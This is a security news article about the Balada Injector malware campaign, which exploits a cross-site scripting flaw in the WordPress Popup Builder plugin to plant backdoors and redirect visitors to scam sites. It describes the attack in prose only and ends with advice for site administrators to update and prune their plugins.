Recent Balada Injector Malware Infects Over 6,700 Vulnerable WordPress sites

The campaign, known as Balada Injector, began in mid-December and has infected a staggering number of over 6,700 websites. Researchers at Dr. Web recently uncovered a coordinated attack campaign targeting WordPress websites using outdated versions of the Popup Builder plugin.

Further investigation revealed that Balada Injector is not a new operation but has been running since 2017, compromising more than 17,000 WordPress sites. The attack involves injecting a backdoor into compromised sites, which redirects visitors to fake support pages, lottery sites, and push notification scams.

Latest Campaign

Similarly, the latest campaign employed cross-site scripting (XSS) vulnerability, CVE-2023-6000, in Popup Builder versions 4.2.3 and earlier. Additionally, Popup Builder is a trendy plugin used by approximately 200,000 sites to create customized popups for marketing and informational purposes.

Moreover, website security firm Sucuri reported that Balada Injector quickly incorporated an exploit for this vulnerability. The attackers hijacked the "sgpbWillOpen" event in Popup Builder, executing malicious JavaScript code in the site's database when the popup was launched. Additionally, the attackers used a secondary infection method by modifying the wp-blog-header.php file to inject the same JavaScript backdoor.

After gaining access, the threat actors checked for admin-related cookies, allowing them to load various script sets and inject the main backdoor, posing as a plugin named 'wp-felody.php.' Sucuri researchers noted that the initial breach is never the final step, as the attackers consistently install the main backdoor.

The 'felony' backdoor provides capabilities such as executing random PHP code, uploading and executing files, communicating with the attackers, and fetching additional payloads. Likewise, to date, the number of compromised websites in the Balada Injector campaign has risen to 6,700. Sucuri's analysis of the domains used in the attacks reveals a pattern in their registration, indicating an attempt to obfuscate the true origin of the attacks, including the use of Cloudflare firewalls.

Security researcher Randy McEoin has identified push notification scams as the primary redirections in this campaign. However, protecting against Balada Injector attacks requires WordPress site administrators to update their themes and plugins to the latest versions and uninstall any unsupported or unnecessary products.

By minimizing the number of active plugins on a WordPress site, admins can decrease the attack surface and reduce the risk of breaches caused by automated scripts.